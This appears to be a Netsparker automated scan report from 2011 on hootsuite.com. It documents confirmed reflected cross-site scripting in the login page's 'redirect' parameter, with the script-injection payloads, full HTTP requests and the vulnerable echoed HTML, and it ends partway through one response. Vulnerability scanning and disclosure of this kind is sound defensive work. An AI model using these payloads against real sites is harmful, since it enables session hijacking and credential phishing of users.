XSS, Cross Site Scripting, hootsuite.com, CWE-79, CAPEC-86, Javascript Injection
Netsparker - Scan Report Summary
TARGET URL
http://hootsuite.com/
SCAN DATE
3/1/2011 7:23:55 AM
REPORT DATE
3/1/2011 8:51:53 AM
SCAN DURATION
00:20:18
Total Requests
Average Speed (req/sec.)
10 identified
10 confirmed
0 critical
0 informational
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Boolean SQL Injection, HTTP Header Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the current user's session, or altering the page's HTML on the fly to change its appearance and steal the user's credentials. It happens because input entered by a user is interpreted by the browser as HTML, JavaScript or VBScript.
XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking users' active sessions.
- Changing the look of the page within the victim's browser.
- Mounting a successful phishing attack.
- Intercepting data and performing man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the user.
Prior to sanitizing user input, define a list of expected and acceptable characters and use it to populate a white-list. This list needs to be defined only once and should be used to sanitize and validate all subsequent input.
A number of pre-defined, well-structured white-list libraries are available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting library are good examples.
External References
- /login
CONFIRMED
Parameters
Parameter: redirect | Type: GET | Value: '"--></style></script><script>alert(0x0005FF)</script>
Request
GET /login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FF)%3C/script%3E HTTP/1.1
Referer: http://hootsuite.com/affiliate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; signup_plan_id=2
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:42 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success."
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary login rb-a-5"> <div class="title"> <h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1> <h2>Login</h2> </div> <div class="section"> <div id="loginBox" class="rb-a-4"> <div id="openId"> <script type="text/javascript"> $().ready(function() { openid.init('openid_identifier'); }); </script> <form id="openid_form" action="https://hootsuite.com/openid-start" method="post" > <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0005FF)</script>"/> <div id="openid_choice" style="display: block; "> <h3>Login or Signup with OpenID</h3> <p>Select one of these third-party accounts:</p> <div id="openid_btns"></div> </div> <div id="openid_input_area"></div> </form> </div> <div id="secureId"> <form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <label for="email" class="title">Email:</label> <input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" /> <p class="formError"></p> <label for="password" class="title">Password:</label> 
<input id="password" type="password" name="loginInfo[password]" maxlength="100" /> <p class="formError"></p> <p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p> <p class="remember"> <label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked /> Remember me</label> </p> <div class="btns"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a> </div> <div class="info"> Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a> </div> <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0005FF)</script>" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> </div> </div> </div> </div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.1651 | 0 | 0% | 0">©2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm 
select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login
CONFIRMED
Parameters
Parameter: redirect | Type: GET | Value: '"--></style></script><script>alert(0x0008FD)</script>
Parameter: language | Type: GET | Value: en
Request
GET /login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008FD)%3C/script%3E&language=en HTTP/1.1
Referer: https://hootsuite.com/login?redirect=affiliate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=105f2ea3bb6f58c9f1810bc4fdfe9dd5eee494f3; signup_plan_id=2
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:24:51 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 12
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success."
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary login rb-a-5"> <div class="title"> <h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1> <h2>Login</h2> </div> <div class="section"> <div id="loginBox" class="rb-a-4"> <div id="openId"> <script type="text/javascript"> $().ready(function() { openid.init('openid_identifier'); }); </script> <form id="openid_form" action="https://hootsuite.com/openid-start" method="post" > <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0008FD)</script>"/> <div id="openid_choice" style="display: block; "> <h3>Login or Signup with OpenID</h3> <p>Select one of these third-party accounts:</p> <div id="openid_btns"></div> </div> <div id="openid_input_area"></div> </form> </div> <div id="secureId"> <form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <label for="email" class="title">Email:</label> <input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" /> <p class="formError"></p> <label for="password" class="title">Password:</label> 
<input id="password" type="password" name="loginInfo[password]" maxlength="100" /> <p class="formError"></p> <p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p> <p class="remember"> <label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked /> Remember me</label> </p> <div class="btns"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a> </div> <div class="info"> Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a> </div> <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0008FD)</script>" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> </div> </div> </div> </div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.211 | 0 | 0% | 0">©2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm 
select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login
CONFIRMED
Parameters
Parameter: loginInfo[email] | Type: POST | Value: netsparker@example.com
Parameter: loginInfo[password] | Type: POST | Value: 3
Parameter: loginInfo[rememberMe] | Type: POST | Value: on
Parameter: redirect | Type: POST | Value: '"--></style></script><script>alert(0x0009BB)</script>
Parameter: form_submit | Type: POST | Value: Login
Request
POST /login HTTP/1.1
Referer: http://hootsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hootsuite.com
Cookie: _SID=105f2ea3bb6f58c9f1810bc4fdfe9dd5eee494f3; signup_plan_id=2
Content-Length: 201
Accept-Encoding: gzip, deflate

loginInfo[email]=netsparker%40example.com&loginInfo[password]=3&loginInfo[rememberMe]=on&redirect='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0009BB)%3c%2fscript%3e&form_submit=Login
Response
HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:25:24 GMT
Content-Type: text/html
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 32
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success."
/> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript"> var hs = hs || {}; hs.timers = new Object(); hs.prefs = new Object(); hs.c = new Object(); hs.c.rootUrl = "http://hootsuite.com"; hs.c.rootUrlSSL = "https://hootsuite.com"; hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images"; hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf"; hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js"; hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production"; hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? 
hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/'; hs.c.tweetPageSize = 30; hs.prefs.language = ''; hs.timezoneOffset=null; hs.memberId=null; hs.socialNetworks=[]; hs.socialNetworksKeyedByType=[]; hs.memberAutoInitial=""; hs.prefs.isNotifyNewTweet=0; hs.prefs.isNewRetweet = 0; hs.prefs.theme = ''; hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB hs.languagePack = {}; hs.gp = 0; hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe"; hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm"; hs.fbFanpageId="177463958820"; </script> <script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script> <div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div class="errorMessage global-message rb-a-4" id="flashMessage_Error"> <a class="icon-19 close" onclick="fadeSlideRemove($('#flashMessage_Error')); return false;">Close</a> <h3>Error</h3> <strong>There are errors, please check the message below.</strong> </div> <div id="content"> <div class="primary login rb-a-5"> <div class="title"> <h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1> <h2>Login</h2> </div> <div class="section"> <div id="loginBox" class="rb-a-4"> <div id="openId"> <script type="text/javascript"> $().ready(function() { openid.init('openid_identifier'); }); </script> <form id="openid_form" action="https://hootsuite.com/openid-start" method="post" > <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0009BB)</script>"/> <div id="openid_choice" style="display: block; "> <h3>Login or Signup with OpenID</h3> <p>Select one of these third-party accounts:</p> <div id="openid_btns"></div> </div> <div id="openid_input_area"></div> </form> </div> <div id="secureId"> <form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, 
'_submitLogin');" action="https://hootsuite.com/login"> <label for="email" class="title">Email:</label> <input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" /> <p class="formError">The supplied email can not be found</p> <label for="password" class="title">Password:</label> <input id="password" type="password" name="loginInfo[password]" maxlength="100" /> <p class="formError"></p> <p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p> <p class="remember"> <label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked /> Remember me</label> </p> <div class="btns"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a> </div> <div class="info"> Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a> </div> <input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0009BB)</script>" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> </div> </div> </div> </div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.2166 | 0.001 | 0.5% | 1">©2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script 
type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. 
